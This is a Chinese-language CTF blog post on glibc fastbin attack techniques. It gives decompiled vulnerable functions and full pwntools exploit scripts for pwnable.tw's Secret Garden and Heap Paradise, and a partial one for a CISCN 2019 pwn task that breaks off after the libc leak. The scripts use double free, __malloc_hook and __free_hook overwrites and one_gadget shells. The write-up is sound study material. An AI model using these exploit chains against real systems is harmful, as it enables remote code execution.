Fastbin attack 小结

这几天刷了四道题,巧了都是Fastbin attack,本来惯用的套路是直接onegadget打__malloc_hook,然后所有onegadget都打不通的情况也很常见,我之前所知道的仅仅局限于__realloc_hook__malloc_hook的联合使用来调整堆栈,但是也有一定的局限性,这次结合pwnable.tw上的几道题以及CTFhub上收录的CISCN 2019的一道题,小小地总结一下Fastbin attack的一些套路。

Fastbin

Free

  1. 部分可以参考House of Spirit,写得比较详细了。
  2. 有看到过fastbin合并的操作,但是因为目前没有接触过所以在这里不涉及,欢迎补充

Malloc

  1. malloc一个fastbin的时候,会检查该fastbin的size是否合法:
    1
    2
    3
    4
       // Glibc 2.27
    size_t victim_idx = fastbin_index (chunksize (victim));
    if (__builtin_expect (victim_idx != idx, 0))
    malloc_printerr ("malloc(): memory corruption (fast)");
  2. 与free一个fastbin不同,malloc一个fastbin不受该fastbin必须地址对齐的约束,也就是说只要size满足便可以任意分配
  3. 若有其他特征,欢迎补充

Fastbin attack

鉴于由于经常遇到直接往__malloc_hook写onegadget,然后通过malloc触发的方法往往不管用的情况,提供一些解决方案。

realloc, __realloc_hook, __malloc_hook

这种方法的思路主要是通过realloc来调整堆栈,使得满足onegadget的约束条件

原理


直接查看GI__libc_realloc的汇编码(这里是Glibc 2.27):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
0x7ffff7a7cc30 <__GI___libc_realloc>:	    push   r15 
0x7ffff7a7cc32 <__GI___libc_realloc+2>: push r14
0x7ffff7a7cc34 <__GI___libc_realloc+4>: push r13
0x7ffff7a7cc36 <__GI___libc_realloc+6>: push r12
0x7ffff7a7cc38 <__GI___libc_realloc+8>: push rbp
0x7ffff7a7cc39 <__GI___libc_realloc+9>: push rbx
0x7ffff7a7cc3a <__GI___libc_realloc+10>: sub rsp,0x18
0x7ffff7a7cc3e <__GI___libc_realloc+14>: mov rax,QWORD PTR [rip+0x35238b]
0x7ffff7a7cc45 <__GI___libc_realloc+21>: mov rax,QWORD PTR [rax] ; __realloc_hook
0x7ffff7a7cc48 <__GI___libc_realloc+24>: test rax,rax ; test if __realloc_hook != NULL
0x7ffff7a7cc4b <__GI___libc_realloc+27>: jne 0x7ffff7a7cee0 <__GI___libc_realloc+688> ; prepare to call __realloc_hook
0x7ffff7a7cc51 <__GI___libc_realloc+33>: test rsi,rsi
0x7ffff7a7cc54 <__GI___libc_realloc+36>: mov rbp,rsi
0x7ffff7a7cc57 <__GI___libc_realloc+39>: mov rbx,rdi
0x7ffff7a7cc5a <__GI___libc_realloc+42>: sete al
0x7ffff7a7cc5d <__GI___libc_realloc+45>: test rdi,rdi
0x7ffff7a7cc60 <__GI___libc_realloc+48>: setne dl
0x7ffff7a7cc63 <__GI___libc_realloc+51>: and al,dl
0x7ffff7a7cc65 <__GI___libc_realloc+53>: jne 0x7ffff7a7cf10 <__GI___libc_realloc+736>
0x7ffff7a7cc6b <__GI___libc_realloc+59>: test rdi,rdi
..............
0x7ffff7a7cee0 <__GI___libc_realloc+688>: mov rdx,QWORD PTR [rsp+0x48]
0x7ffff7a7cee5 <__GI___libc_realloc+693>: add rsp,0x18
0x7ffff7a7cee9 <__GI___libc_realloc+697>: pop rbx
0x7ffff7a7ceea <__GI___libc_realloc+698>: pop rbp
0x7ffff7a7ceeb <__GI___libc_realloc+699>: pop r12
0x7ffff7a7ceed <__GI___libc_realloc+701>: pop r13
0x7ffff7a7ceef <__GI___libc_realloc+703>: pop r14
0x7ffff7a7cef1 <__GI___libc_realloc+705>: pop r15
0x7ffff7a7cef3 <__GI___libc_realloc+707>: jmp rax ; jump to __realloc_hook to execute
0x7ffff7a7cef5 <__GI___libc_realloc+709>: nop DWORD PTR [rax]
0x7ffff7a7cef8 <__GI___libc_realloc+712>: mov rax,QWORD PTR [rip+0x351f69]
0x7ffff7a7ceff <__GI___libc_realloc+719>: xor r13d,r13d
0x7ffff7a7cf02 <__GI___libc_realloc+722>: mov DWORD PTR fs:[rax],0xc
0x7ffff7a7cf09 <__GI___libc_realloc+729>: jmp 0x7ffff7a7ce1e <__GI___libc_realloc+494>
0x7ffff7a7cf0e <__GI___libc_realloc+734>: xchg ax,ax
0x7ffff7a7cf10 <__GI___libc_realloc+736>: call 0x7ffff7a7b950 <__GI___libc_free>
0x7ffff7a7cf15 <__GI___libc_realloc+741>: xor r13d,r13d
0x7ffff7a7cf18 <__GI___libc_realloc+744>: jmp 0x7ffff7a7ce1e <__GI___libc_realloc+494>
0x7ffff7a7cf1d <__GI___libc_realloc+749>: nop DWORD PTR [rax]
0x7ffff7a7cf20 <__GI___libc_realloc+752>: mov rdx,QWORD PTR [rip+0x351e59]

如果仅仅关注__realloc_hook存在的情况,那么将上述代码提取出来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
0x7ffff7a7cc30 <__GI___libc_realloc>:	    push   r15 
0x7ffff7a7cc32 <__GI___libc_realloc+2>: push r14
0x7ffff7a7cc34 <__GI___libc_realloc+4>: push r13
0x7ffff7a7cc36 <__GI___libc_realloc+6>: push r12
0x7ffff7a7cc38 <__GI___libc_realloc+8>: push rbp
0x7ffff7a7cc39 <__GI___libc_realloc+9>: push rbx
0x7ffff7a7cc3a <__GI___libc_realloc+10>: sub rsp,0x18
0x7ffff7a7cc3e <__GI___libc_realloc+14>: mov rax,QWORD PTR [rip+0x35238b] ; __realloc_hook
0x7ffff7a7cc45 <__GI___libc_realloc+21>: mov rax,QWORD PTR [rax] ; *__realloc_hook
0x7ffff7a7cee0 <__GI___libc_realloc+688>: mov rdx,QWORD PTR [rsp+0x48]
0x7ffff7a7cee5 <__GI___libc_realloc+693>: add rsp,0x18
0x7ffff7a7cee9 <__GI___libc_realloc+697>: pop rbx
0x7ffff7a7ceea <__GI___libc_realloc+698>: pop rbp
0x7ffff7a7ceeb <__GI___libc_realloc+699>: pop r12
0x7ffff7a7ceed <__GI___libc_realloc+701>: pop r13
0x7ffff7a7ceef <__GI___libc_realloc+703>: pop r14
0x7ffff7a7cef1 <__GI___libc_realloc+705>: pop r15
0x7ffff7a7cef3 <__GI___libc_realloc+707>: jmp rax ; jump to *__realloc_hook to execute

可以明显地看到在realloc开始,这里进行了6次push操作,以及一次sub rsp,0x18,再要跳转到__realloc_hook之前,这里又pop了6次,以及一次add rsp,0x18来进行平衡堆栈。

所以只要相应地减少push的次数或者直接跳转到__GI___libc_realloc+14的位置执行,就能达到压低栈帧的目的,以满足onegadgeat的约束条件。

因此,只要将__malloc_hook写入realloc+X,将__realloc_hook写入onegadget,救能达到调整栈的目的。至于X是多少,就可在调试的时候观察执行到onegadget的时候,栈的下方多少位置是0,然后再做相应调整。

1
malloc ==> __malloc_hook(realloc+X) ==> __realloc_hook(onegadget)


注意,这种方法有时候不一定行得通,因为可能在可调整范围内并没有为0的栈位置,也有可能调整后原本为0的位置被改掉了。

举例

这里暂时没有办法提供举例,但是由于这个方法十分简单并且容易理解,所以讲讲原理就行了。

fastbin corruption

由于fastbin存在的double free检测机制,会调用malloc_printerr,从而间接地调用malloc来触发__malloc_hook

原理

原理就不多说了,就是利用fastbin double free corruption来调用__malloc_hook的同时,完成了对onegadget约束的满足。

举例

Secret Garden

delete功能中存在很明显的free后没有清空指针的漏洞,可以进行fastbin double free

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
int delete()
{
int result; // eax
_DWORD *v1; // rax
unsigned int v2; // [rsp+4h] [rbp-14h]
unsigned __int64 v3; // [rsp+8h] [rbp-10h]

v3 = __readfsqword(0x28u);
if ( !chunk_number )
return puts("No flower in the garden");
__printf_chk(1LL, "Which flower do you want to remove from the garden:");
__isoc99_scanf("%d", &v2);
if ( v2 <= 0x63 && (v1 = (_DWORD *)chunk_array[v2]) != 0LL )
{
*v1 = 0;
free(*(void **)(chunk_array[v2] + 8LL));
result = puts("Successful");
}
else
{
puts("Invalid choice");
result = 0;
}
return result;
}

主要利用思路:

  1. 首先free出一个unsorted bin然后分配这个unsorted bin,利用view功能leak出unsorted bin->bk中残留的main_arena地址,从而得到libc基址,计算出__malloc_hook的地址。

  2. 由于fastbin的分配有size检查,所以不能直接分配__malloc_hook处,而是要利用上方的一些地址的高字节0x7F来伪造size字段,从而完成目标内存分配:

  3. 经过尝试,所有的onegadget都没办法直接打通,这里就需要借助fastbin double free corruption来间接触发__malloc_hook,这里使用的onegadget是条件为[rsp+0x50]==NULL的那个。
    解题exp(有些地方有些奇怪是因为尝试过realloc调栈的方法,没成功,但懒得改了):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    context.log_level = "debug"

    def add(length, name, color):
    p.sendlineafter("Your choice : ", "1")
    p.sendlineafter("Length of the name :", str(length))
    p.sendafter("The name of flower :", name)
    p.sendlineafter("The color of the flower :", color)

    def view(index):
    p.sendlineafter("Your choice : ", "2")
    p.recvuntil("Name of the flower[" + str(index) + "] :")
    return p.recvuntil("\n")[:-1]

    def delete(index):
    p.sendlineafter("Your choice : ", "3")
    p.sendlineafter("Which flower do you want to remove from the garden:", str(index))

    main_arena_offset = 0x3c3b20
    realloc_hook_offset = 0x00000000003c3b08 # libc.symbols["__relloc_hook"] # __malloc_hook = __realloc_hook + 0x8
    realloc_offset = libc.symbols["realloc"]
    # one_gadget_offset = 0xf0567
    one_gadget_offset = 0xef6c4
    # one_gadget_offset = 0x4526a

    # fast bin double free
    add(0x68, "AAAA", "AAAA") # chunk 0
    add(0x68, "BBBB", "BBBB") # chunk 1
    delete(0)
    delete(1)
    delete(0)

    # leak heap address
    # don't break the double free loop
    add(0x68, "\xe0", "AAAA") # chunk 2
    heap_addr = u64(view(2).ljust(8, "\x00"))
    heap_base = heap_addr - 0x10e0

    # unsorted bin
    add(0x200, "CCCC", "CCCC") # chunk 3
    add(0x48, "DDDD", "DDDD") # chunk 4
    delete(3)

    # leak libc
    add(0x48, "E" * 8, "EEEE") # chunk 5
    main_arena = u64(view(5)[8:].ljust(8, "\x00")) - 0x58
    libc_base = main_arena - main_arena_offset
    realloc_hook = libc_base + realloc_hook_offset
    libc_realloc = libc_base + realloc_offset
    one_gadget = libc_base + one_gadget_offset

    # use the double free
    add(0x68, p64(realloc_hook + 8 - 0x23), "EEEE") # chunk 6
    add(0x68, "FFFF", "FFFF") # chunk 7
    add(0x68, "GGGG", "GGGG") # chunk 8

    # write realloc_hook and malloc_hook
    add(0x68, (p64(one_gadget) + p64(one_gadget)).rjust(0x1b, "H"), "HHHH") # chunk 9

    # trigger malloc_hook (use malloc_printerr, directly call malloc won't work)
    # p.sendlineafter("Your choice : ", "1")
    delete(8)
    delete(8)

    success("heap_addr: " + hex(heap_addr))
    success("heap_base: " + hex(heap_base))
    success("main_arena: " + hex(main_arena))
    success("libc_base: " + hex(libc_base))
    success("libc_realloc: " + hex(libc_realloc))
    success("realloc_hook: " + hex(realloc_hook))
    success("one_gadget: " + hex(one_gadget))

    p.interactive()

    一些题外话:
    此外,我搜了很多关于__malloc_printerr是怎么触发__malloc_hook的,都没有找到原因。还是特别想知道,咋办?
    __malloc_hook写成puts,在触发前在puts处下断点,然后利用gdb的backtrace看下调用栈,藏得够深(还是malloc触发的,只不过这个这个malloc经过了N层函数调用,所以其实可以直接在malloc下断点就行了)。。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    #0  _IO_puts (str=0x24 <error: Cannot access memory at address 0x24>) at ioputs.c:33
    #1 0x00007fe6f4da3d8a in __strdup (s=0x7ffd7c35b6a0 "/lib/x86_64-linux-gnu/libgcc_s.so.1") at strdup.c:42
    #2 0x00007fe6f4d9f60f in _dl_load_cache_lookup (name=name@entry=0x7fe6f4b49aa6 "libgcc_s.so.1") at dl-cache.c:311
    #3 0x00007fe6f4d8ff99 in _dl_map_object (loader=loader@entry=0x7fe6f4fab4d8, name=name@entry=0x7fe6f4b49aa6 "libgcc_s.so.1", type=type@entry=0x2, trace_mode=trace_mode@entry=0x0, mode=mode@entry=0x90000001, nsid=<optimized out>) at dl-load.c:2342
    #4 0x00007fe6f4d9c3a7 in dl_open_worker (a=a@entry=0x7ffd7c35bd90) at dl-open.c:237
    #5 0x00007fe6f4d97394 in _dl_catch_error (objname=objname@entry=0x7ffd7c35bd80, errstring=errstring@entry=0x7ffd7c35bd88, mallocedp=mallocedp@entry=0x7ffd7c35bd7f, operate=operate@entry=0x7fe6f4d9c300 <dl_open_worker>, args=args@entry=0x7ffd7c35bd90) at dl-error.c:187
    #6 0x00007fe6f4d9bbd9 in _dl_open (file=0x7fe6f4b49aa6 "libgcc_s.so.1", mode=0x80000001, caller_dlopen=0x7fe6f4ad2fd1 <__GI___backtrace+193>, nsid=0xfffffffffffffffe, argc=<optimized out>, argv=<optimized out>, env=0x7ffd7c35cac8) at dl-open.c:660
    #7 0x00007fe6f4b009bd in do_dlopen (ptr=ptr@entry=0x7ffd7c35bfb0) at dl-libc.c:87
    #8 0x00007fe6f4d97394 in _dl_catch_error (objname=0x7ffd7c35bfa0, errstring=0x7ffd7c35bfa8, mallocedp=0x7ffd7c35bf9f, operate=0x7fe6f4b00980 <do_dlopen>, args=0x7ffd7c35bfb0) at dl-error.c:187
    #9 0x00007fe6f4b00a74 in dlerror_run (args=0x7ffd7c35bfb0, operate=0x7fe6f4b00980 <do_dlopen>) at dl-libc.c:46
    #10 __GI___libc_dlopen_mode (name=name@entry=0x7fe6f4b49aa6 "libgcc_s.so.1", mode=mode@entry=0x80000001) at dl-libc.c:163
    #11 0x00007fe6f4ad2fd1 in init () at ../sysdeps/x86_64/backtrace.c:52
    #12 __GI___backtrace (array=array@entry=0x7ffd7c35c010, size=size@entry=0x40) at ../sysdeps/x86_64/backtrace.c:105
    #13 0x00007fe6f49dd9f5 in backtrace_and_maps (do_abort=<optimized out>, do_abort@entry=0x2, written=<optimized out>, fd=fd@entry=0x3) at ../sysdeps/unix/sysv/linux/libc_fatal.c:47
    #14 0x00007fe6f4a357e5 in __libc_message (do_abort=do_abort@entry=0x2, fmt=fmt@entry=0x7fe6f4b4e2e0 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:172
    #15 0x00007fe6f4a3de0a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7fe6f4b4e3a8 "double free or corruption (fasttop)", action=0x3) at malloc.c:5004
    #16 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0x0) at malloc.c:3865
    #17 0x00007fe6f4a4198c in __GI___libc_free (mem=<optimized out>) at malloc.c:2966
    #18 0x000055eca8269e79 in ?? ()
    #19 0x000000087c35cab0 in ?? ()
    #20 0x77c3b85bb5ec5800 in ?? ()
    #21 0x0000000000000000 in ?? ()

    最后在__strdup里面调用了一次malloc触发了__malloc_hook

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    char *
    __strdup (const char *s)
    {
    size_t len = strlen (s) + 1;
    void *new = malloc (len);

    if (new == NULL)
    return NULL;

    return (char *) memcpy (new, s, len);
    }

    (有点好奇,咋发现的,这也tql。。)

    Heap Paradise

    程序很简单,delete功能存在明显的free后没有清空指针的漏洞,所以毋庸置疑又是fastbin double free:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    void delete()
    {
    __int64 v0; // [rsp+8h] [rbp-8h]

    printf("Index :");
    v0 = choice();
    if ( v0 <= 15 )
    free(chunk_array[v0]);
    }

    但是add功能限制了能分配的堆块的size:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    int add()
    {
    size_t v0; // rax
    int i; // [rsp+4h] [rbp-Ch]
    unsigned int size; // [rsp+8h] [rbp-8h]

    for ( i = 0; ; ++i )
    {
    if ( i > 15 )
    {
    LODWORD(v0) = puts("You can't allocate anymore !");
    return v0;
    }
    if ( !chunk_array[i] )
    break;
    }
    printf("Size :");
    v0 = choice();
    size = v0;
    if ( v0 <= 0x78 )
    {
    chunk_array[i] = malloc(v0);
    if ( !chunk_array[i] )
    {
    puts("Error!");
    exit(-1);
    }
    printf("Data :");
    LODWORD(v0) = read_data((__int64)chunk_array[i], size);
    }
    return v0;
    }

    主要思路就是:

  4. 利用fastbin double free形成chunk overlap,创造出一个unsorted bin。

  5. 注意到题目是没有view功能的,所以只能通过partial overwrite unsorted bin->fd,使其指向_IO_2_1_stdout结构体附近,然后通过fastbin分配该处空间来更改结构体从而完成leak libc。

  6. libc leak完成之后,剩下的就是再次利用fastbin double free改__malloc_hook为onegadget。

  7. 题目的难点在于,只能分配16次chunk,要在有限的chunk里完成这么多动作,考察的就是堆布局的能力了,所以至于如何布局这里就不再赘述了。
    此外,由于我的写法在完成上述操作之后就用完的所有的add机会,所以只能通过fastbin double free corruption来触发__malloc_hook了。

    我的exp(布局肯定不止这一种,仅供参考):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    one_gadget_offset = 0xef6c4
    malloc_hook_offset = libc.symbols["__malloc_hook"]

    # context.log_level = "debug"

    def add(size, data):
    p.sendlineafter("You Choice:", "1")
    p.sendlineafter("Size :", str(size))
    p.sendafter("Data :", data)

    def delete(index):
    p.sendlineafter("You Choice:", "2")
    p.sendlineafter("Index :", str(index))

    libc_offset = 0x3c4600

    while True:
    try:
    # fastbin double free
    add(0x68, p64(0) + p64(0x71)) # chunk 0
    add(0x28, "BBBB") # chunk 1
    add(0x28, "CCCC") # chunk 2
    add(0x68, "D" * 0x40 + p64(0) + p64(0x21)) # chunk 3
    delete(0)
    delete(3)
    delete(0)

    # create unsorted bin
    add(0x68, "\x10") # chunk 4
    add(0x68, "DDDD") # chunk 5
    add(0x68, "EEEE") # chunk 6
    add(0x68, "F" * 0x50 + p64(0) + p64(0xb1)) # chunk 7

    # # free unsorted bin
    delete(1)

    # # malloc unsorted bin, perform partially write to stdout
    delete(3)
    add(0x58, "G" * 0x20 + p64(0) + p64(0x81) + p64(0)) # chunk 8
    delete(2)

    # # brute force 4 bits
    add(0x78, "H" * 0x20 + p64(0) + p64(0x71) + p16(0xa620 - 0x43)) # chunk 9

    add(0x68, "IIII") # chunk 10
    add(0x68, "J" * 0x33 + p64(0xfbad1800) + p64(0) * 3 + "\x00") # chunk 11

    string = p.recv(4)
    if string == "****" or string == "read":
    p.close()
    if _pwn_remote == 0:
    p = process(argv=[_proc], env=_setup_env())
    else:
    p = remote('chall.pwnable.tw', 10308)
    if _debug != 0:
    gdb.attach(p)
    else:
    p.recv(0x40-4)
    libc_addr = u64(p.recv(8))
    libc_base = libc_addr - 0x3c4600
    malloc_hook = libc_base + malloc_hook_offset
    one_gadget = libc_base + one_gadget_offset
    break

    except:
    p.close()
    if _pwn_remote == 0:
    p = process(argv=[_proc], env=_setup_env())
    else:
    p = remote('chall.pwnable.tw', 10308)
    if _debug != 0:
    gdb.attach(p)

    # write __malloc_hook
    delete(0)
    delete(3)
    delete(0)
    add(0x68, p64(malloc_hook - 0x23)) # chunk 12
    add(0x68, "KKKK") # chunk 13
    add(0x68, "LLLL") # chunk 14
    add(0x68, "I" * 0x13 + p64(one_gadget)) # chunk 15

    # double free error ==> malloc_printerr ==> __malloc_hook
    delete(1)
    delete(1)

    if _pwn_remote == 1:
    context.log_level = "debug"
    p.send("cat /home/heap_paradise/flag\x00")

    success("libc_addr: " + hex(libc_addr))
    success("libc_base: " + hex(libc_base))
    # success("libc_realloc: " + hex(libc_realloc))
    success("malloc_hook: " + hex(malloc_hook))
    success("one_gadget: " + hex(one_gadget))

    p.interactive()

write __free_hook through top chunk

这应该是最稳的方法之一了,因为直接调system("/bin/sh")一般来说没有什么限制,但是利用起来还是要花一点功夫的。

原理

我们知道fastbin的malloc需要满足size的约束,但是__free_hook的上方全是”\x00”,显然无法直接分配,所以需要借助其他的办法。

首先了解一下main_arena的结构(这是堆块信息还没有被写入的时候):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
gef➤  p main_arena
$1 = {
mutex = 0x0,
flags = 0x0,
have_fastchunks = 0x0,
fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
top = 0x0,
last_remainder = 0x0,
bins = {0x0 <repeats 254 times>},
binmap = {0x0, 0x0, 0x0, 0x0},
next = 0x7ffff7dcfc40 <main_arena>,
next_free = 0x0,
attached_threads = 0x1,
system_mem = 0x0,
max_system_mem = 0x0
}

可见这个的top储存了top chunk的位置,也就是说当我们需要从top chunk分配内存空间的时候,会从这里获取top chunk的位置信息,然后再切割分配(下图是Glibc 2.27下的情况):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
gef➤  p main_arena
$2 = {
mutex = 0x0,
flags = 0x0,
have_fastchunks = 0x0,
fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
top = 0x555555757270,
last_remainder = 0x0,
bins = {
0x7ffff7dcfca0 <main_arena+96>, 0x7ffff7dcfca0 <main_arena+96>,
0x7ffff7dcfcb0 <main_arena+112>, 0x7ffff7dcfcb0 <main_arena+112>,
......
0x7ffff7dd0480 <main_arena+2112>, 0x7ffff7dd0480 <main_arena+2112>
}
binmap = {0x0, 0x0, 0x0, 0x0},
next = 0x7ffff7dcfc40 <main_arena>,
next_free = 0x0,
attached_threads = 0x1,
system_mem = 0x21000,
max_system_mem = 0x21000
}

那么就可以通过修改main_arena中的top__free_hook的上方某个区域(该区域存在足够大的数据以充当size字段),然后通过不断地从top chunk分配内存空间直到可以写到__free_hook中去。

但是观察main_arena上方可以发现,并不能直接利用fastbin attack分配到可以写top的地址空间:

那么这里还需要多利用一次fastbin attack,在top的上方进行fastbin attack写入size来供后续的fastbin attack改写top

还有一个问题,把top chunk改到哪里,经调试发现,在__free_hook-0xb58的位置发现一个足够大的值(随机的)可作为top chunk的size(不知道不同版本的Glibc会不会有差异,这里测试的Glibc 2.23和Gblic 2.27都符合情况):

1
2
3
4
5
6
7
8
9
10
11
12
13
gef➤  p &__free_hook
$2 = (void (**)(void *, const void *)) 0x7ffff7dd18e8 <__free_hook>
gef➤ tele 0x7ffff7dd18e8-0xb58
0x00007ffff7dd0d90│+0x0000: 0x0000000000000004
0x00007ffff7dd0d98│+0x0008: 0x9aa83c6e1b4e13d1
0x00007ffff7dd0da0│+0x0010: 0x0000000000000000
0x00007ffff7dd0da8│+0x0018: 0x0000000000000000
0x00007ffff7dd0db0│+0x0020: 0x0000000000000000
0x00007ffff7dd0db8│+0x0028: 0x0000000000000000
0x00007ffff7dd0dc0│+0x0030: 0x0000000000000000
0x00007ffff7dd0dc8│+0x0038: 0x0000000000000000
0x00007ffff7dd0dd0│+0x0040: 0x0000000000000000
0x00007ffff7dd0dd8│+0x0048: 0x0000000000000000

这样就可以劫持top chunk,然后不断地malloc,直到往__free_hook写入system的地址,最后free一个写有”/bin/sh”的堆块就可以geshell了。

举例

CISCN-2019-华东北赛区-Pwn-pwn4

edit功能的getsize提供了一个字节溢出,可以off by one造成chunk overlap从而造成uaf:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
__int64 edit()
{
int v1; // [rsp+Ch] [rbp-14h]
signed int v2; // [rsp+Ch] [rbp-14h]
signed int v3; // [rsp+10h] [rbp-10h]
int v4; // [rsp+14h] [rbp-Ch]

printf("index: ");
v2 = choice(v1);
v3 = v2;
if ( v2 >= 0 && v2 <= 15 )
{
v2 = *((_DWORD *)&chunk_status + 4 * v2);
if ( v2 == 1 )
{
printf("size: ");
v2 = choice(1);
v4 = get_size(*((_DWORD *)&chunk_size + 4 * v3), v2);
if ( v2 > 0 )
{
printf("content: ", (unsigned int)v2);
v2 = read_data(chunk_array[2 * v3], v4);
}
}
}
return (unsigned int)v2;
}

__int64 __fastcall get_size(int a1, unsigned int a2)
{
__int64 result; // rax

if ( a1 > (signed int)a2 )
return a2;
if ( a2 - a1 == 10 )
LODWORD(result) = a1 + 1;
else
LODWORD(result) = a1;
return (unsigned int)result;
}

add功能限制最大的内存分配空间是0x100,还有一个需要注意的点,add功能是用calloc来分配内存空间的,calloc分配内存会事先清空内存区域,同时不会从tcache中取chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
__int64 add()
{
__int64 result; // rax
unsigned int i; // [rsp+4h] [rbp-1Ch]
int v2; // [rsp+8h] [rbp-18h]
signed int v3; // [rsp+8h] [rbp-18h]
void *v4; // [rsp+10h] [rbp-10h]

result = 0LL;
for ( i = 0; (signed int)i <= 15; ++i )
{
result = *((unsigned int *)&chunk_status + 4 * (signed int)i);
if ( !(_DWORD)result )
{
printf("size: ");
v3 = choice(v2);
if ( v3 > 0 )
{
if ( v3 > 4096 )
v3 = 4096;
v4 = calloc(v3, 1uLL);
if ( !v4 )
exit(-1);
*((_DWORD *)&chunk_status + 4 * (signed int)i) = 1;
*((_DWORD *)&chunk_size + 4 * (signed int)i) = v3;
chunk_array[2 * (signed int)i] = v4;
printf("The lowbits of heap leak check : %x\n", chunk_array[2 * (signed int)i] & 0xFFFLL);
printf("the index of ticket is %d \n", i);
}
return i;
}
}
return result;
}


主要思路就是:

  1. 其实题目没有给libc,这里之所以能知道有tcache是因为add给了chunk的低三个字节,可以明显看出在堆地址的开头是有分配0x250字节的tcache struct的。
  2. 事先分配释放7个size=0x71的chunk以填满tcache,之后才能将相应的chunk放入fastbin中实现fastbin attack。
  3. 再利用edit功能的off by one,形成chunk overlap,修改下一个chunk的size来创造unsorted bin从而leak libc地址。
  4. 利用chunk overlap形成uaf,实现fastbin attack将main_arenatop上方布置好size,注意我分配的空间是包含了__malloc_hook的,所以要保持其为NULL
  5. 再利用fastbin attack改掉top__free_hook-0xb58,因为不太清楚main_arena中其他结构体信息会不会造成其他位置影响,所以其他地方尽量保持不动
  6. 不断地申请释放空间(由于chunk的数量有限制),这里其实还是利用了calloc不会分配tcache的特性,注意一个tcache bin被填满后一定要换一个tcache bin,否则刚free出来的chunk会放进fastbin中,再次分配不会从top chunk切。
  7. 分配到__free_hook上方时,将system写入__free_hook,注意__free_hook上方有些位置不能写入内容(有待深入了解),因为在调试的过程中发现,若某些位置被填入数据会陷入__lll_lock_wait_private造成死锁状态,所以其他位置用”\x00”填充就好了。
  8. 之后free一个包含”/bin/sh”的chunk就能触发`system(“/bin/sh”)”了。
    我的完整exp如下:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    context.log_level = "debug"

    def add(size):
    p.sendlineafter("CHOICE: ", "1")
    p.sendlineafter("size: ", str(size))
    p.recvuntil("The lowbits of heap leak check : ")
    return p.recv(3)

    def edit(index, size, content):
    p.sendlineafter("CHOICE: ", "2")
    p.sendlineafter("index: ", str(index))
    p.sendlineafter("size: ", str(size))
    p.sendafter("content: ", content)

    def delete(index):
    p.sendlineafter("CHOICE: ", "3")
    p.sendlineafter("index: ", str(index))

    def view(index, label=""):
    p.sendlineafter("CHOICE: ", "4")
    p.sendlineafter("index: ", str(index))
    if label != "":
    p.recvuntil(label)
    else:
    p.recvuntil("content: ")

    unsorted_bin_offset = 0x60
    main_arena_offset = 0x3ebc40
    __malloc_hook_offset = 0x3ebc30
    __free_hook_offset = 0x3ed8e8
    realloc_offset = 0x98c30
    system_offset = 0x4f440

    for i in range(7):
    chunk = add(0x68)
    delete(0)

    chunk_0 = add(0x58)
    chunk_0 = int(chunk_0, 16)

    chunk_1 = add(0x18)

    # unsorted bin
    chunk_2 = add(0xF8)

    # overwrite size
    edit(0, 0x58 + 10, "A" * 0x58 + "\x71")

    # create unsorted bin
    edit(2, 0x50, "A" * 0x40 + p64(0) + p64(0x21))
    delete(1)
    chunk_1 = add(0x68)
    edit(1, 0x20, "B" * 0x18 + p64(0x501))

    # leave enough space
    for i in range(5):
    chunk_3 = add(0xF8)
    delete(3)

    # free unsorted bin
    delete(2)

    # leak libc
    view(1, p64(0x501))
    main_arena = u64(p.recv(8))
